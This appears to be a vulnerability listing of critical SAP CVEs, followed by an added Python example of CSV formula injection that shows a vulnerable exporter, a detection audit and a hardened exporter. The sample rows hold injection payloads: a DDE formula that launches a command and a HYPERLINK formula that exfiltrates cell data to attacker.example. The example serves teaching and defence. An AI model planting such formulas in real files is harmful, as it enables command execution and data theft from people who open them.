Vulnerabilities > SAP > Critical
DATE | CVE | VULNERABILITY (TITLE: DESCRIPTION) | RISK (CVSS SCORE) |
---|---|---|---|
2020-02-05 | CVE-2011-1517 | Unspecified vulnerability in SAP NetWeaver 7.0: SAP NetWeaver 7.0 allows remote code execution and denial of service due to an error in the DiagTraceHex() function. | 9.8 |
2020-01-23 | CVE-2013-1592 | Classic buffer overflow in SAP NetWeaver: a buffer overflow exists in the Message Server service's _MsJ2EE_AddStatistics() function when specially crafted SAP Message Server packets are sent to remote TCP ports 36NN and/or 39NN on SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote attacker execute arbitrary code. | 9.8 |
2019-12-11 | CVE-2019-0403 | Improper neutralization of formula elements in a CSV file in SAP Enable Now 10/1902/1908: SAP Enable Now, before version 1911, allows an attacker to input commands (formula elements) into CSV files, which are executed when the file is opened in a spreadsheet application, leading to CSV command injection. | 9.8 |
2019-08-14 | CVE-2019-0345 | Server-Side Request Forgery (SSRF) in SAP NetWeaver Application Server Java: a remote unauthenticated attacker can abuse a web service in SAP NetWeaver Application Server for Java (Administrator System Overview), versions 7.30, 7.31, 7.40, 7.50, by sending a specially crafted XML file and tricking the application server into leaking the authentication credentials for its own SAP Management Console, resulting in Server-Side Request Forgery. | 9.8 |
2019-08-14 | CVE-2019-0344 | Deserialization of untrusted data in SAP Commerce Cloud: due to unsafe deserialization in the virtualjdbc extension of SAP Commerce Cloud, versions 6.4, 6.5, 6.6, 6.7, 1808, 1811, 1905, it is possible to execute arbitrary code on the target machine with the rights of the 'Hybris' user, resulting in code injection. | 9.8 |
2019-07-10 | CVE-2019-0330 | Code injection in SAP Diagnostics Agent 7.20: the OS Command Plugin in transaction GPA_ADMIN and the OSCommand Console of SAP Diagnostics Agent (LM-Service), version 7.2, allow an attacker to inject code that is then executed by the application. | 9.1 |
2019-06-12 | CVE-2019-0304 | Injection vulnerability in SAP products (FTP function of the SAP NetWeaver AS ABAP Platform): affected kernel versions are KRNL32NUC 7.21, 7.21EXT, 7.22, 7.22EXT; KRNL32UC 7.21, 7.21EXT, 7.22, 7.22EXT; KRNL64NUC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49; KRNL64UC 7.21, 7.21EXT, 7.22, 7.22EXT, 7.49, 7.73; KERNEL 7.21, 7.45, 7.49, 7.53, 7.73. The flaw allows an attacker to inject code or a specially crafted command that is executed by the application. | 9.8 |
2019-04-10 | CVE-2019-0285 | Cleartext storage of sensitive information in SAP Crystal Reports 2010: the .NET SDK WebForm Viewer in SAP Crystal Reports for Visual Studio (fixed in version 2010) discloses sensitive database information, including credentials, which can be misused by an attacker. | 9.8 |
2019-02-15 | CVE-2019-0261 | Missing authentication for critical function, listed under SAP Landscape Management 3.0 (the description concerns SAP HANA XS advanced): under certain circumstances, SAP HANA Extended Application Services, advanced model (XS advanced), does not properly perform authentication checks for XS advanced platform and business users. | 9.8 |
2019-02-15 | CVE-2019-0259 | Unrestricted upload of file with dangerous type in SAP BusinessObjects 4.2/4.3: SAP BusinessObjects, versions 4.2 and 4.3 (Visual Difference), allows an attacker to upload any file, including script files, without proper file format validation. | 9.8 |
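The CSV formula injection class behind CVE-2019-0403 above (a cell that starts with `=`, `+`, `-` or `@` is evaluated as a formula when the file is opened in a spreadsheet) is the one entry in this list whose mechanism is fully described, so here is an added Python example of both sides of it: a vulnerable export, a detection check over an existing CSV, and the hardened export that prefixes such cells with a single quote while leaving genuine numbers in declared numeric columns alone. This is illustrative code written for this page, not SAP's code, and it does not reproduce the SAP Enable Now issue itself, whose exact vector is not described here; the sample rows, the payload strings and the `numeric_columns` convention are constructed for the example.

```python
import csv
import io

# Leading characters that make a spreadsheet treat a cell as a formula rather
# than text (per OWASP CSV injection guidance). Tab and carriage return are
# included because they can terminate the cell early in some importers.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_cell(value: str) -> bool:
    """True if a spreadsheet would interpret this cell as a formula."""
    return value.startswith(FORMULA_TRIGGERS)


def looks_numeric(value: str) -> bool:
    """True for plain numbers such as '-17' or '3.5', which legitimately start
    with a formula trigger and must not be rewritten in numeric columns."""
    try:
        float(value)
    except ValueError:
        return False
    return True


def neutralize_cell(value: str) -> str:
    """Prefix a formula trigger with a single quote so the cell stays text.
    The csv module separately handles quoting of commas, quotes and newlines."""
    if is_formula_cell(value):
        return "'" + value
    return value


def export_csv(rows, numeric_columns=frozenset(), neutralize=True) -> str:
    """Write rows to CSV text. With neutralize=True (the hardened path) every
    formula-looking cell is escaped, except cells in numeric_columns that
    really are numbers; neutralize=False reproduces the vulnerable export."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    for row in rows:
        out = []
        for col, cell in enumerate(row):
            cell = str(cell)
            if neutralize and not (col in numeric_columns and looks_numeric(cell)):
                cell = neutralize_cell(cell)
            out.append(cell)
        writer.writerow(out)
    return buf.getvalue()


def audit_csv(text: str, numeric_columns=frozenset()):
    """Detection check for an existing CSV export: return (row, col, value) for
    every cell a spreadsheet would evaluate, ignoring genuine numbers in
    numeric_columns."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text, newline=""))):
        for c, cell in enumerate(row):
            if is_formula_cell(cell) and not (c in numeric_columns and looks_numeric(cell)):
                findings.append((r, c, cell))
    return findings


# Constructed sample data (hypothetical): a review export where the
# user-controlled "comment" and "amount" fields carry classic payloads (a DDE
# command launch, a HYPERLINK exfiltration formula, an @-formula). Column 2 is
# the numeric "amount" column, so a legitimate "-17" must survive unchanged.
SAMPLE_ROWS = [
    ["user", "comment", "amount"],
    ["alice", "looks good", "42"],
    ["mallory", "=cmd|' /C calc'!A0", "-17"],
    ["eve", '=HYPERLINK("http://attacker.example/?"&A2,"open")', "@SUM(1)"],
]
NUMERIC_COLUMNS = frozenset({2})

if __name__ == "__main__":
    unsafe = export_csv(SAMPLE_ROWS, NUMERIC_COLUMNS, neutralize=False)
    print("findings in vulnerable export:", audit_csv(unsafe, NUMERIC_COLUMNS))
    safe = export_csv(SAMPLE_ROWS, NUMERIC_COLUMNS)
    print("findings in hardened export:", audit_csv(safe, NUMERIC_COLUMNS))
    print(safe)
```

The single-quote prefix is the widely recommended mitigation because it is honoured by Excel, LibreOffice and Google Sheets, but it is visible in some tools, which is why the example whitelists columns that are validated as numeric instead of escaping `-17` into `'-17`. Detection without that column knowledge flags every negative number, so `audit_csv` takes the same `numeric_columns` set as the exporter.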